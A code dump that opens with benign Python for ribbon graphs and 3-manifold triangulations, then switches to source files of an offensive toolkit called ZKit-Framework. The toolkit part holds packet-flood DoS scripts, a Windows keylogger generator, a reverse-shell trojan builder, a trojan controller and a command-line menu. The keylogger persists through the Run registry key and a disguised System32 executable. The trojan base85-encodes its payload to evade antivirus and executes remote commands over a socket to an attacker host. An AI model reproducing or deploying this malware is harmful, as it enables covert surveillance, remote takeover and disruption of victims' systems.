return self.ribbon_graph.face('01')
else:
raise Exception()
def edge_mapping(self):
mappings = []
tet_index = str(self.snappy_tetrahedron.Index)
for i in [14,13,11,7]:
assert self.snappy_tetrahedron.Gluing[i].sign() == 1
perm = Permutation(self.snappy_tetrahedron.Gluing[i].dict)
neighbor = str(self.snappy_tetrahedron.Neighbor[i].Index)
face = self.face_from_snappy_label(i)
edge_mapping = {}
for directed_edge in face:
directed_edge_permuted = ''.join([str(perm[int(s)]) for s in directed_edge])
directed_edge_permuted = self.ribbon_graph.opposite[directed_edge_permuted]
edge_mapping[tet_index+'|'+directed_edge]=neighbor+'|'+directed_edge_permuted
mappings.append(edge_mapping)
return mappings
def face_pairing(self):
face_mapping = {}
tet_index = str(self.snappy_tetrahedron.Index)
for i in range(4):
code = self.snappy_label_to_code[i]
assert self.snappy_tetrahedron.Gluing[code].sign() == 1
perm = Permutation(self.snappy_tetrahedron.Gluing[code].dict)
neighbor = str(self.snappy_tetrahedron.Neighbor[code].Index)
directed_edge = self.face_from_missing_vertex(i)[0]
directed_edge_permuted = ''.join([str(perm[int(s)]) for s in directed_edge])
directed_edge_permuted = self.ribbon_graph.opposite[directed_edge_permuted]
opposite_face = self.snappy_label_from_face(directed_edge_permuted)
face_mapping['F{} of tet{}'.format(i,tet_index)]='F{} of tet{}'.format(opposite_face,neighbor)
return face_mapping
def snappy_label_from_face(self, directed_edge):
face = self.ribbon_graph.face(directed_edge)
v = set('0123')
for l in face:
v = v-set(l)
return v.pop()
def directed_edge_to_cut_face_label(self, directed_edge):
return directed_edge+'_1'
def edge_mapping_on_cut_faces(self):
edge_mapping = self.edge_mapping()
return [{i+'_1':j+'_1' for i,j in mapping.items()} for mapping in edge_mapping]
def with_tet_label(self):
si = str(self.snappy_tetrahedron.Index)+'|'
op = self.cut_ribbon_graph.opposite
new_op = Permutation({si+label : si+op[label] for label in op})
next = self.cut_ribbon_graph.next
new_next = Permutation({si+label : si+next[label] for label in next})
return RibbonGraph([new_op,new_next])
def directed_edge_to_vertex_corner(self, directed_edge):
l01 = '{}_0,{}_1'.format(directed_edge, directed_edge)
return self.cut_ribbon_graph.next_corner()[l01],self.cut_ribbon_graph.next[l01]
def add_normal_curve(self, directed_edge, num_crossings):
l1, l2 = self.directed_edge_to_vertex_corner(directed_edge)
class TriangulationSkeleton(object):
def __init__(self, mcomplex, meridian_info=None):
self.tetrahedra = [Tetrahedron(tet) for tet in mcomplex.Tetrahedra]
self.ribbon_graph = RibbonGraph([Permutation(), Permutation()])
for tet in self.tetrahedra:
self.ribbon_graph = self.ribbon_graph.union(tet.with_tet_label())
if meridian_info:
self.add_meridian()
self.glue_boundary_faces()
self.classify_lace_components()
def pair_edge_mappings(self):
edge_mappings = []
paired = []
for tet in self.tetrahedra:
edge_mappings.extend(tet.edge_mapping_on_cut_faces())
while edge_mappings:
mapping = edge_mappings.pop()
source, target = mapping.items()[0]
for other_mapping in edge_mappings:
if target in other_mapping:
edge_mappings.remove(other_mapping)
paired.append((mapping, other_mapping))
return paired
def glue_boundary_faces(self):
paired = self.pair_edge_mappings()
self.cycles = []
for mapping, other_mapping in paired:
for label in mapping:
assert other_mapping[mapping[label]] == label
label1, label2 = mapping.popitem()
#print(label1, label2)
self.cycles.append(self.ribbon_graph.face(label1))
self.ribbon_graph = self.ribbon_graph.glue_faces(label1,label2)
def classify_lace_components(self):
lace_components = set(map(tuple, self.ribbon_graph.lace_components()))
self.face_curves = []
self.edge_curves = []
while lace_components:
lc = lace_components.pop()
op_lc = None
for other_lc in lace_components:
if self.ribbon_graph.opposite[lc[0]] in other_lc:
op_lc = other_lc
break
lace_components.remove(op_lc)
is_face_curve = False
for cycle in self.cycles:
if (lc[0] in cycle) or (op_lc[0] in cycle):
is_face_curve = True
break
if is_face_curve:
self.face_curves.append( (lc, op_lc) )
else:
if len(self.ribbon_graph.face(lc[0]))==4:
self.edge_curves.append( (lc, op_lc) )
else:
self.edge_curves.append( (op_lc, lc) )
nc_squared = self.ribbon_graph.next_corner()*self.ribbon_graph.next_corner()
edge_curve_set = set(self.edge_curves)
self.opposite_edge_curves = {}
while edge_curve_set:
ec, ec_op = edge_curve_set.pop()
l = nc_squared[ec[0]]
ec_opposite_comp = None
for other_ec, other_ec_op in edge_curve_set:
if l in other_ec:
ec_opposite_comp = other_ec
break
self.opposite_edge_curves[ec] = ec_opposite_comp
def print_data(self):
label_numbering = {}
R = self.ribbon_graph
labels = R.labels()
i = 1
X = R.euler_characteristic()
assert X % 2 == 0
print('Genus: {}'.format((2-X)//2))
while labels:
l = labels.pop()
o = R.opposite[l]
labels.remove(o)
label_numbering[l] = i
label_numbering[o] = -i
i+=1
print('vertices:')
for v in R.vertices():
print([label_numbering[l] for l in v])
print('faces:')
for f in R.faces():
print([label_numbering[l] for l in f])
print('face curves:')
for fc, op_fc in self.face_curves:
print([label_numbering[l] for l in fc])
print([label_numbering[l] for l in op_fc])
print('')
print('edge curves:')
for ec, op_ec, adj_ec, op_adj_ec in self.edge_curves:
print([label_numbering[l] for l in ec])
print([label_numbering[l] for l in op_ec])
print([label_numbering[l] for l in adj_ec])
print([label_numbering[l] for l in op_adj_ec])
print('')
def cut_open(self):
R = self.ribbon_graph.copy()
for lc, op_lc in self.edge_curves:
C = cycle_from_lace_component(R, lc[0])
print(C)
R = C.cut()
return R
def with_edges_contracted(self):
R = self.ribbon_graph.copy()
for ec in self.opposite_edge_curves.values():
if ec:
print(ec)
for l in ec:
delete_edge(R,l)
return R
def lace_component_intersection_graph(self):
new_labels
def add_meridian(self):
pass
def truncate_vertices(ribbon_graph):
new_opposite = dict(ribbon_graph.opposite)
next_inverse = ribbon_graph.next.inverse()
new_next = {}
for label in ribbon_graph.labels():
next_label = ribbon_graph.next[label]
previous_label = next_inverse[label]
new_next[label]= label+','+next_label
new_next[label+','+previous_label]= label
new_next[label+','+next_label]= label+','+previous_label
new_opposite[label+','+next_label]=next_label+','+label
new_opposite[next_label+','+label]=label+','+ next_label
new_opposite = Permutation(new_opposite)
new_next = Permutation(new_next)
return RibbonGraph(permutations=[new_opposite,new_next])
def thicken_edges(ribbon_graph):
new_op = {}
for label in ribbon_graph.labels():
old_op_label = ribbon_graph.opposite[label]
new_op[label+'_0']=old_op_label+'_1'
new_op[label+'_1']=old_op_label+'_0'
new_next = {}
for label in ribbon_graph.labels():
old_next_label = ribbon_graph.next[label]
new_next[label+'_0']=label+'_1'
new_next[label+'_1']=old_next_label+'_0'
new_op = Permutation(new_op)
new_next = Permutation(new_next)
return RibbonGraph(permutations=[new_op,new_next])
def truncate_vertices_old(ribbon_graph):
new_opposite = dict(ribbon_graph.opposite)
next_inverse = ribbon_graph.next.inverse()
new_next = {}
for label in ribbon_graph.labels():
next_label = ribbon_graph.next[label]
previous_label = next_inverse[label]
new_next[label]= (label, next_label)
new_next[(label,previous_label)]= label
new_next[(label,next_label)]= (label,previous_label)
new_opposite[(label,next_label)]=(next_label,label)
new_opposite[(next_label,label)]=(label, next_label)
new_opposite = Permutation(new_opposite)
new_next = Permutation(new_next)
return RibbonGraph(permutations=[new_opposite,new_next])
def triangulation_from_pairing(pairing):
"""
Given pairs of tuples ((directed_edge1,tet_label1),(directed_edge2,tet_label2)), return a Triangulation object with those gluings.
"""
gluing = Permutation(cycles=pairing)
tetrahedra = {}
for pair1, pair2 in pairing:
directed_edge1, tet_label1 = pair1
directed_edge2, tet_label2 = pair2
if tet_label1 not in tetrahedra:
tetrahedra[tet_label1] = tetrahedron(tet_label1)
if tet_label2 not in tetrahedra:
tetrahedra[tet_label2] = tetrahedron(tet_label2)
U = RibbonGraph([Permutation(), Permutation()])
for T in tetrahedra.values():
U = U.union(T)
return Triangulation(U, gluing)
def triangulation_from_tuples(tuples):
"""
Given 6-tuples (v1, v2 ,tet_label1, w1, w2 , tet_label2), return a Triangulation object with those gluings.
"""
tetrahedra = {}
parsed = []
for six_tuple in tuples:
v1, v2 , tet_label1, w1, w2, tet_label2 = six_tuple
if tet_label1 not in tetrahedra:
tetrahedra[tet_label1] = tetrahedron(tet_label1)
if tet_label2 not in tetrahedra:
tetrahedra[tet_label2] = tetrahedron(tet_label2)
parsed.append( (((v1,v2),tet_label1), ((w1,w2),tet_label2) ))
U = RibbonGraph([Permutation(), Permutation()])
for T in tetrahedra.values():
U = U.union(T)
gluing = Permutation(cycles=parsed)
return Triangulation(U, gluing)
def doubled():
return [(0,1,0,0,1,1),
(1,2,0,1,2,1),
(2,0,0,2,0,1),
(1,0,0,1,0,1)]
def doubled2():
return [(0,1,0,1,0,1),
(1,2,0,2,1,1),
(2,0,0,0,2,1),
(1,0,0,0,1,1)]
import snappy
def test_one_skeleton(limit):
i = 0
for M in snappy.OrientableClosedCensus:
if i > limit:
break
i += 1
MC = snappy.snap.t3mlite.Mcomplex(M)
S = TriangulationSkeleton(snappy.snap.t3mlite.Mcomplex(M))
ec = S.ribbon_graph.euler_characteristic()
cc = len(S.ribbon_graph.connected_components())
lc = len(S.ribbon_graph.lace_components())
# print(lc == (sum(e.valence() for e in MC.Edges)+sum(1 for f in MC.Faces)))
print(lc == 4*len(MC.Edges)+2*len(MC.Faces))
print([len(v) == 4 for v in S.ribbon_graph.vertices()])
if (ec >= 0) or (ec%2 != 0) or (cc>1):
print(M)
def filled_triangulation_and_triangulation_skeleton(snappy_string):
M = snappy.Manifold(snappy_string)
M.dehn_fill((1,0))
MF = M.filled_triangulation()
MC = snappy.snap.t3mlite.Mcomplex(MF)
return MC, TriangulationSkeleton(MC)
def triangulation_and_triangulation_skeleton(snappy_string):
M = snappy.Manifold(snappy_string)
# M.dehn_fill((1,0))
# MF = M.filled_triangulation()
MC = snappy.snap.t3mlite.Mcomplex(M)
return MC, TriangulationSkeleton(MC)
def peripheral_curve_data(snappy_manifold):
indices, curve_data = snappy_manifold._get_cusp_indices_and_peripheral_curve_data()
meridians = []
longitudes = []
num_tets = snappy_manifold.num_tetrahedra()
for tet_number in range(num_tets):
meridian_row = curve_data[tet_number*4]
longitude_row = curve_data[tet_number*4+2]
print(meridian_row)
print(longitude_row)
for i in range(4):
for j in range(4):
if meridian_row[4*i+j] != 0:
meridians.append( (tet_number,i,j,meridian_row[4*i+j]) )
if longitude_row[4*i+j] != 0:
longitudes.append( (tet_number,i,j,longitude_row[4*i+j]) )
return meridians, longitudes
def collapse_to_single_vertex(ribbon_graph):
found_non_loop = True
R = ribbon_graph.copy()
while found_non_loop:
found_non_loop = False
for label in R.labels():
if R.opposite[label] not in R.vertex(label):
contract_edge(R, label)
found_non_loop = True
break
return R
def spanning_tree(ribbon_graph, start_label):
half_edges = ribbon_graph._vertex_search(start_label)
"""
def _get_cusp_indices_and_peripheral_curve_data(self):
cdef int i, j, k, v, f
cdef TriangulationData* data
triangulation_to_data(self.c_triangulation, &data)
result_cusp_indices = []
for i from 0 <= i < self.num_tetrahedra():
row = []
for v from 0 <= v < 4:
row.append(
data.tetrahedron_data[i].cusp_index[v]
)
result_cusp_indices.append(row)
result_curves = []
for i from 0 <= i < self.num_tetrahedra():
for j from 0 <= j < 2: # meridian, longitude
for k from 0 <= k < 2: # righthanded, lefthanded
row = []
for v from 0 <= v < 4:
for f from 0 <= f < 4:
row.append(
data.tetrahedron_data[i].curve[j][k][v][f]
)
result_curves.append(row)
free_triangulation_data(data)
return (result_cusp_indices, result_curves)
"""
|
{"/ribbon_graph_base.py": ["/permutation.py", "/cycle.py"], "/maps.py": ["/permutation.py"], "/draw.py": ["/cycle.py", "/decompositions.py"], "/decompositions.py": ["/cycle.py"], "/__init__.py": ["/ribbon_graph_base.py", "/cycle.py", "/maps.py", "/permutation.py", "/trees.py", "/decompositions.py"], "/cycle.py": ["/local_moves.py"], "/trees.py": ["/ribbon_graph_base.py", "/permutation.py"], "/three_manifold.py": ["/permutation.py", "/ribbon_graph_base.py", "/cycle.py", "/local_moves.py"]}
|
27,882
|
lbh3110/ZKit-Framework
|
refs/heads/master
|
/ZKit_Core/Dos_Attackers/SM.py
|
def Run(*self, Source_IP, Victim_IP, Source_Port, Victim_Ports, Count, Message):
from scapy.all import sendp as Send, TCP as tcp, IP as ip
from time import sleep as Sleep
from sys import exit as Exit
print("This Operation Needs Administrator Permission")
print("Running UAC")
Victim_Ports = Victim_Ports.split()
if Count != "-1":
print("Press Ctrl + C To Stop The Process")
for i in range(0, Count):
try:
IP = ip(src=Source_IP, dst=Victim_IP)
TCP = tcp(sport=Source_Port, dport=(
[Victim_Port for Victim_Port in Victim_Ports]))
Packet = IP / TCP / Message
Send(Packet)
print("Send Packet To Target {} from IP {} And Port {} To Port {}".format(
Victim_IP, Source_IP, Source_Port, Victim_Port))
except KeyboardInterrupt:
print("Already Send {} Packets To Target {} from IP {} And Port {} To Port {}".format(
i, Victim_IP, Source_IP, Source_Port, Victim_Port))
break
Sleep(2)
Exit(0)
else:
i = 0
while True:
try:
print("Press Ctrl + C To Stop The Process")
IP = ip(source_IP=Source_IP, destination=Victim_IP)
TCP = tcp(srcport=Source_Port, dstport=(
[Victim_Port for Victim_Port in Victim_Ports]))
Packet = IP / TCP / Message
Send(Packet)
print("Send Packet To Target {} from IP {} And Port {} To Port {}".format(
Victim_IP, Source_IP, Source_Port, Victim_Port))
i += 1
except KeyboardInterrupt:
print("Already Send {} Packets To Target {} from IP {} And Port {} To Port {}".format(
i, Victim_IP, Source_IP, Source_Port, Victim_Port))
Sleep(2)
Exit(0)
|
{"/zkit.py": ["/ZKit_Core/Trojans/Reverse_Shell_TCP.py", "/ZKit_Core/Dos_Attackers/SS.py", "/ZKit_Core/KeyLoggers/TCP.py", "/ZKit_Core/Trojans/UDP_Connect.py"]}
|
27,883
|
lbh3110/ZKit-Framework
|
refs/heads/master
|
/ZKit_Core/Dos_Attackers/SS.py
|
def Run(*self, Source_IP, Victim_IP, Source_Port, Victim_Port, Count, Message):
print("Scapy Needs Administrator Permission")
from scapy.all import sendp as Send
from scapy.all import IP as ip, TCP as tcp
import scapy.all
from time import sleep as Sleep
from sys import exit as Exit
i = 0
if Count != "-1":
print("Press Ctrl + C To Stop The Process")
for i in range(0, Count):
try:
IP = ip(src=Source_IP, dst=Victim_IP)
TCP = tcp(sport=Source_Port, dport=Victim_Port)
Packet = IP / TCP / Message
Send(Packet)
print("Send Packet To Target {} from IP {} And Port {} To Port {}".format(
Victim_IP, Source_IP, Source_Port, Victim_Port))
except KeyboardInterrupt:
print("Already Send {} Packets To Target {} from IP {} And Port {} To Port {}".format(
i, Victim_IP, Source_IP, Source_Port, Victim_Port))
break
Sleep(2)
Exit(0)
else:
print("Press Ctrl + C To Stop The Process")
i = 0
while True:
try:
IP = ip(src=Source_IP, dst=Victim_IP)
TCP = tcp(sport=Source_Port, dport=Victim_Port)
Packet = IP / TCP / Message
Send(Packet)
print("Send Packet To Target {} from IP {} And Port {} To Port {}".format(
Victim_IP, Source_IP, Source_Port, Victim_Port))
i += 1
except KeyboardInterrupt:
print("Already Send {} Packets To Target {} from IP {} And Port {} To Port {}".format(
i, Victim_IP, Source_IP, Source_Port, Victim_Port))
Sleep(2)
Exit(0)
|
{"/zkit.py": ["/ZKit_Core/Trojans/Reverse_Shell_TCP.py", "/ZKit_Core/Dos_Attackers/SS.py", "/ZKit_Core/KeyLoggers/TCP.py", "/ZKit_Core/Trojans/UDP_Connect.py"]}
|
27,884
|
lbh3110/ZKit-Framework
|
refs/heads/master
|
/ZKit_Core/KeyLoggers/TCP.py
|
import colorama
import socket
def Create(*self, Host, Port, a1, a2, a3, a4, a5, a6, a7, a8, a9, a10, a11, a12, a13, a14, PATH):
from time import sleep as Sleep
Red, Blue, Green, Reset = colorama.Fore.LIGHTRED_EX, colorama.Fore.LIGHTBLUE_EX, colorama.Fore.LIGHTGREEN_EX, colorama.Fore.RESET
print("[", Green + "!" + Reset + "]" + Reset +
"Opening File To Write Data On It...", end="")
Sleep(0.2)
try:
f = open(PATH, "w+")
except:
print(
"\r[" + Red + "-" + "]" + Reset + "Opening File To Write Data On It...Failed \n Cannnot Open File")
Sleep(0.2)
return False
else:
print("\r[" + Blue + "+" + Reset + "]" + Reset +
"Opening File To Write Data On It...Done")
Sleep(0.2)
KeyLogger_Data = """
from winreg import OpenKey , SetValueEx
from pynput.keyboard import Key, Listener
import logging
from os import system
def {a1}() :
{a2} = str(__file__)
{a3} = open({a2} , "rb")
{a4} = {a3}.read()
{a3}.close()
{a5} = r"C:\Windows\system32\Security Health.exe"
{a6} = open({a5} , "wb")
{a6}.write({a4})
{a6}.close()
system({a6})
{a7}="Software\\Microsoft\\Windows\\CurrentVersion\\Run"
{a8} = OpenKey("HKEY_LOCAL_MACHINE",{a7},0,"KEY_ALL_ACCESS")
SetValueEx({a7}, "SecurityHealth",0,"REG_SZ", {a5})
def {a13}({a9}):
global {a10}
{a10} += {a9}
{a11}.send({a10}.encode('UTF-8'))
if __name__ == "__main__":
{a10} = ""
{a1}()
import socket
{a12} = False
while not {a12} :
try :
{a11} = socket.socket(socket.AF_INET , socket.SOCK_STREAM)
port = {p}
host = "{h}"
{a11}.connect((host , port))
{a12} = True
except :
{a12} = False
while {a12} :
try :
with Listener(on_press={a13}) as {a14}:
{a14}.join()
except :
{a12} = False
""".format(h=Host, p=Port, a1=a1, a2=a2, a3=a3, a4=a4, a5=a5, a6=a6, a7=a7, a8=a8, a9=a9,
a10=a10, a11=a11, a12=a12, a13=a13, a14=a14)
from colorama import Fore
Red, Blue, Green, Reset = Fore.LIGHTRED_EX, Fore.LIGHTBLUE_EX, Fore.LIGHTGREEN_EX, Fore.RESET
from time import sleep as Sleep
print("[" + Green + "!" + Reset + "]" +
Reset + "Writing Data On File...", end="")
try:
f.write(KeyLogger_Data)
except PermissionError:
print("\r[" + Red + "-" + Reset + "]" + Reset + "Writing Data On File...Failed \nSomething Went Wrong . Looks Like "
"You Dont Have Access To The File.")
except:
print("\r[", Red + "-", "]" + Reset + "Writing Data On File...Failed \nSomething Went Wrong . Is Another Process "
"Using It ? ")
Sleep(0.2)
print("[", Red + "-", "]" + Reset +
"Couldnt Write Data On File Closing File...", end="")
f.close()
Sleep(0.2)
print("Done")
else:
print("\r[" + Blue + "+" + Reset + "]" + Reset +
"Writing Data On File...Done")
print("[" + Blue + "+" + Reset + "]",
Fore.RESET + "Succesfully Created KeyLogger")
Sleep(1)
|
{"/zkit.py": ["/ZKit_Core/Trojans/Reverse_Shell_TCP.py", "/ZKit_Core/Dos_Attackers/SS.py", "/ZKit_Core/KeyLoggers/TCP.py", "/ZKit_Core/Trojans/UDP_Connect.py"]}
|
27,885
|
lbh3110/ZKit-Framework
|
refs/heads/master
|
/ZKit_Core/Trojans/UDP_Connect.py
|
import socket
from colorama import Fore
def Connect(self):
Connection = socket.socket(socket.AF_INET , socket.SOCK_DGRAM)
print("[" + Fore.LIGHTBLUE_EX + '+' + "] Making Connection")
try:
Victim, Address = Connection.accept()
os = Victim.recv(1024).decode('UTF-8')
print("[" + Fore.LIGHTBLUE_EX + '+' + "] Got Platfrom from victim")
Connected = True
while Connected :
self.Command = str(
input("{Victim}@{os} ".format(Victim = Address ,os = os)))
Connection.send(self.Command.encode("UTF-8"))
print(Connection.recv(1024).decode("UTF-8"))
except :
Connected = False
print("[" + Fore.LIGHTRED_EX + '-' + "] Connection Failed.Victim Might Be Offline Try Again Later")
return False
|
{"/zkit.py": ["/ZKit_Core/Trojans/Reverse_Shell_TCP.py", "/ZKit_Core/Dos_Attackers/SS.py", "/ZKit_Core/KeyLoggers/TCP.py", "/ZKit_Core/Trojans/UDP_Connect.py"]}
|
27,886
|
lbh3110/ZKit-Framework
|
refs/heads/master
|
/ZKit_Core/Trojans/Reverse_Shell_TCP.py
|
import colorama
import socket
from base64 import b85encode , b85decode
def Create(*self, Host, Port, str1, str2, str3, str4, PATH):
"""Creates Reverse_Shell Trojan With Parameters"""
from time import sleep as Sleep
Red, Blue, Green, Reset = colorama.Fore.LIGHTRED_EX, colorama.Fore.LIGHTBLUE_EX, colorama.Fore.LIGHTGREEN_EX, colorama.Fore.RESET
print("[" , Green + "!" + Reset + "]" + Reset +
"Opening File To Write Data On It...", end = "")
Sleep(0.2)
try:
f = open(PATH, "w+")
except:
print(
"\r["+ Red + "-" + "]" + Reset + "Opening File To Write Data On It...Failed \n Cannnot Open File")
Sleep(0.2)
return False
else:
print("\r[" + Blue + "+" + Reset + "]" + Reset +
"Opening File To Write Data On It...Done")
Sleep(0.2)
Trojan_Data = """
import socket
import os
import sys
{Connected} = False
while not {Connected} :
try :
{Connection} = socket.socket(socket.AF_INET , socket.SOCK_STREAM)
port = {p}
host = "{h}"
{Connection}.connect((host , port))
{Connected} = True
except :
{Connected} = False
while {Connected} :
try :
{Connection}.send((sys.platform).encode('UTF-8'))
{Command} = {Connection}.recv(1024).decode("UTF-8")
if {Command}.strip().split() == "cd " :
{Result} = os.chdir({Command}.strip('cd '))
elif {Command}.strip().split() == "CD " :
{Result} = os.chdir({Command}.strip('CD '))
else :
{Result} = os.popen({Command}).read()
{Connection}.send({Result}.encode("UTF-8"))
except :
{Connected} = False
'''
""".format(Connected=str1, Connection=str2, Command=str3, Result=str4, h=Host, p=Port)
from colorama import Fore
Red , Blue , Green , Reset = Fore.LIGHTRED_EX, Fore.LIGHTBLUE_EX, Fore.LIGHTGREEN_EX, Fore.RESET
from time import sleep as Sleep
print("[" + Blue + "+" + Reset + "]" + Reset + "Encrypting Data Before Writing On File...\n")
Trojan_data=str(b85encode(bytes(Trojan_Data, 'UTF-8')))
Trojan_data= "value = '''\n" + Trojan_data + "\n'''\n"
Trojan_data+='''
value = bytes(value, 'UTF-8')
script_data = b85decode(value)
eval(compile(script_data.decode('UTF-8')))
'''
print("[" + Green + "!" + Reset + "]" + Reset + "Writing Data On File...", end="")
try:
f.write()
except PermissionError:
print("\r[" + Red + "-"+ Reset + "]"+ Reset + "Writing Data On File...Failed \nSomething Went Wrong . Looks Like "
"You Dont Have Access To The File.")
except:
print("\r[" , Red + "-", "]"+ Reset + "Writing Data On File...Failed \nSomething Went Wrong . Is Another Process "
"Using It ? ")
Sleep(0.2)
print("[" , Red + "-", "]" + Reset + "Couldnt Write Data On File Closing File...", end="")
f.close()
Sleep(0.2)
print("Done")
else:
print("\r[" + Blue + "+" + Reset + "]" + Reset + "Writing Data On File...Done")
print("[" + Blue + "+" + Reset + "]", Fore.RESET + "Succesfully Created Trojan")
Sleep(1)
|
{"/zkit.py": ["/ZKit_Core/Trojans/Reverse_Shell_TCP.py", "/ZKit_Core/Dos_Attackers/SS.py", "/ZKit_Core/KeyLoggers/TCP.py", "/ZKit_Core/Trojans/UDP_Connect.py"]}
|
27,887
|
lbh3110/ZKit-Framework
|
refs/heads/master
|
/zkit.py
|
'ZKit-Framework Github : https://github.com/000Zer000/ZKit-Framework'
from sys import platform
__all__ = ["why_do_you_want_to_import_this"]
def why_do_you_want_to_import_this():
'Why do you want to import this'
return "Why_Do_You_Want_To_Import_This"
__author__ = 'Zer0'
# Created A New Header
__github__ = 'https://github.com/000Zer000/ZKit-Framework'
__version__ = '1.0.0'
__license__ = 'Apache License 2.0'
__status__ = 'Developing'
if __name__ == "__main__":
try:
from os import path
from time import sleep as Sleep
from colorama import init, Fore
from ZKit_Banners import Banners
except ImportError as value:
import sys
print("One Or Some On Requirments Not Found . Please Install Them And Try Again ."
+ "Python Threw : " + str(value))
sys.exit(1)
# Initallizing Needed Variables
PATH = path.dirname(__file__)
T_PATH = PATH + "/Builded/Trojan/"
D_PATH = PATH + "/Builded/Dos/"
K_PATH = PATH + "/Builded/KeyLogger/"
R_PATH = PATH + "/Builded/Ransomware/"
init(convert=True)
errors = list('Errors')
print(Fore.LIGHTGREEN_EX + Banners.Banner1 + Fore.RESET)
Sleep(1)
while True:
CHOICES = str(input("ZKit > "))
Choice = CHOICES.split()
try:
if Choice[0] == "trojan" and Choice[5] == "-h" and Choice[7] == "-p":
from ZKit_Core import Main_Process
file_name = T_PATH + Choice[4] + ".pyw"
file_name = Main_Process.Create_File(PATH=file_name)
strs = Main_Process.Anti_Anti_Virus(Count=4)
str1, str2, str3, str4 = list(strs)
if Choice[2] == 'tcp':
import ZKit_Core.Trojans.Reverse_Shell_TCP
ZKit_Core.Trojans.Reverse_Shell_TCP.Create(
Host=Choice[6], Port=Choice[8], str1=str1,
str2=str2, str3=str3, str4=str4, PATH=file_name
)
elif Choice[2] == 'udp':
import ZKit_Core.Trojans.Reverse_Shell_UDP
ZKit_Core.Trojans.Reverse_Shell_UDP.Create(
Host=Choice[6], Port=Choice[8], str1=str1, str2=str2,
str3=str3, str4=str4, PATH=file_name)
elif Choice[2] == 'connect':
if Choice[3] == '-tcp':
import ZKit_Core.Trojans.TCP_Connect
ZKit_Core.Trojans.TCP_Connect.Connect()
if Choice[3] == '-tcp':
import ZKit_Core.Trojans.UDP_Connect
ZKit_Core.Trojans.UDP_Connect.Connect()
elif Choice[0] == 'dos' and (
Choice[1] == 'ss' and Choice[3] == '-s' and Choice[5] == '-v'):
import ZKit_Core.Dos_Attackers.SS
ZKit_Core.Dos_Attackers.SS.Run(
Source_IP=Choice[4], Victim_IP=Choice[6], Source_Port=Choice[6],
Victim_Port=Choice[7], Count=Choice[9], Message=Choice[8])
elif Choice[0] == "keylogger" and Choice[5] == "-h" and Choice[7] == "-p":
print('Attention : This Payload Is for Windows And Must Be Compiled .'
+ 'It Can be easily compiled with pyinstaller')
from ZKit_Core import Main_Process as ms
file_name = K_PATH + Choice[4] + ".pyw"
file_name = Main_Process.Create_File(PATH=file_name)
strs = ms.Anti_Anti_Virus(Count=14)
list(strs)
if Choice[2] == 'tcp':
import ZKit_Core.KeyLoggers.TCP
ZKit_Core.KeyLoggers.TCP.Create(
Host=Choice[6], Port=Choice[8], a1=strs[0],
a2=strs[1], a3=strs[2], a4=strs[3], a5=strs[4],
a6=strs[5], a7=strs[6], a8=strs[7], a9=strs[8],
a10=strs[9], a11=strs[10], a12=strs[11],
a13=strs[12], a14=strs[13], PATH=file_name)
elif Choice[2] == 'udp':
import ZKit_Core.KeyLoggers.UDP
ZKit_Core.KeyLoggers.TCP.Create(
Host=Choice[6], Port=Choice[8], a1=strs[0],
a2=strs[1], a3=strs[2], a4=strs[3], a5=strs[4],
a6=strs[5], a7=strs[6], a8=strs[7], a9=strs[8],
a10=strs[9], a11=strs[10], a12=strs[11],
a13=strs[12], a14=strs[13], PATH=file_name)
elif Choice[0] == 'debug' :
print(errors)
elif CHOICES == 'help':
print(''' *Case sensetive*
# Trojans
trojan -m tcp -f FILENAME -h IP -p PORT
trojan -m tcp -f FILENAME -h HOST -p PORT
trojan -m udp -f FILENAME -h HOST -p PORT
trojan -m udp -f FILENAME -h IP -p PORT
# Trojan controllers
trojan -m connect -tcp
trojan -m connect -tcp
# Dos Attackers
dos -m ss -s SOURCE_IP_OR_HOST SOURCE_PORT -v VICTIM_IP_OR_HOST VICTIM_PORT -m MESSAGE -c COUNT
dos -m sm -s SOURCE_IP_OR_HOST SOURCE_PORT -v VICTIM_IP_OR_HOST VICTIM_PORTS -m MESSAGE -c COUNT
# KeyLogger
keylogger -m tcp -f FILENAME -h IP -p PORT
keylogger -m tcp -f FILENAME -h HOST -p PORT
keylogger -m udp -f FILENAME -h HOST -p PORT
keylogger -m udp -f FILENAME -h IP -p PORT
''')
else:
print("{} Is Not A Valid Input\n".format(CHOICES))
except Exception as value:
value = str(value)
print("Invalid Input Or Not enough Arguments type 'help' to see available commands type . 'debug' to see python exception value(s)")
errors.append(value)
|
{"/zkit.py": ["/ZKit_Core/Trojans/Reverse_Shell_TCP.py", "/ZKit_Core/Dos_Attackers/SS.py", "/ZKit_Core/KeyLoggers/TCP.py", "/ZKit_Core/Trojans/UDP_Connect.py"]}
|
27,888
|
lbh3110/ZKit-Framework
|
refs/heads/master
|
/ZKit_Core/Trojans/__init__.py
|
'Sth'
|
{"/zkit.py": ["/ZKit_Core/Trojans/Reverse_Shell_TCP.py", "/ZKit_Core/Dos_Attackers/SS.py", "/ZKit_Core/KeyLoggers/TCP.py", "/ZKit_Core/Trojans/UDP_Connect.py"]}
|
27,889
|
lbh3110/ZKit-Framework
|
refs/heads/master
|
/ZKit_Core/Main_Process.py
|
import random
import string
def random_string(*size):
size = random.randint(2, 9)
chars = string.ascii_lowercase + string.ascii_uppercase
return ''.join(random.choice(chars) for _ in range(size))
def random_int(size, max, min):
ints = string.digits
while True:
random_int = ''.join(random.choice(ints) for _ in range(size))
if random_int <= max and random_int >= min:
return random_int
else:
pass
def random_ip():
dot = "."
Result = random_int(4, 255, 1) + dot + random_int(4, 255, 1) + \
dot + random_int(4, 255, 1) + dot + random_int(4, 255, 1)
return Result
def Create_File(*self, PATH):
from colorama import Fore
Red, Blue, Green, Reset = Fore.LIGHTRED_EX, Fore.LIGHTBLUE_EX, Fore.LIGHTGREEN_EX, Fore.RESET
from time import sleep as Sleep
print("[" + Green + "!" + Reset + "]" + Reset + "Creating File...", end="")
try:
f = open(PATH, "x").close()
except FileExistsError:
Sleep(0.5)
choice = str(input(
"\r[" + Red + "-" + Reset + "]" + Reset + "Creating File...Failed \nFile Already Exists Confirm Overwrite : (N or Y)"))
Choice = choice.upper()
if Choice == "Y":
return PATH
elif Choice == "N":
file_name = str(input("Write Down File Name Here : "))
file_name += ".pyw"
return file_name
else:
print(Red + "\r[!]" + Reset + "In Valid Input", end="")
return ''
else:
file_name = PATH
print("\r[" + Blue + "+" + Reset + "]" +
Reset + "Creating File...Done", end="")
return file_name
def Anti_Anti_Virus(*self, Count):
from colorama import Fore
Red, Blue, Green, Reset = Fore.LIGHTRED_EX, Fore.LIGHTBLUE_EX, Fore.LIGHTGREEN_EX, Fore.RESET
from time import sleep as Sleep
print("[" + Green + "!" + Reset + "]" +
